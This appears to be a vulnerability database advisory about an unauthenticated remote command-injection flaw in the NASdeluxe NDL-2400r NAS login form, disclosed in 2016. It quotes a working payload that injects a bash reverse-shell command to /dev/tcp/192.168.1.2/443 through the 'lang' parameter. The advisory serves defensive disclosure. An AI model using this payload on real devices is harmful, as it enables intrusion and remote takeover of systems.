A vulnerability, which was classified as critical, has been found in NASdeluxe NDL-2400r 2.01.09/2.01.10. Affected by this issue is an unknown code block of the component /usr/usrgetform.html. The manipulation of the argument lang with the input value ||`bash+-i+>%26+/dev/tcp/192.168.1.2/443+0>%261`&username=&pwd=&site=web_disk&login_btn=Einloggen leads to a privileges management vulnerability. Using CWE to declare the problem leads to CWE-269. The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor. Impacted is confidentiality, integrity, and availability.
The bug was discovered 06/29/2016. The weakness was published 08/03/2016 by Klaus Eisentraut with SYSS as confirmed mailinglist post (Full-Disclosure). The advisory is available at seclists.org. The public release has been coordinated with the vendor. The exploitation is known to be easy. The attack may be launched remotely. No form of authentication is required for exploitation. Technical details as well as a public exploit are known. This vulnerability is assigned to T1068 by the MITRE ATT&CK project.
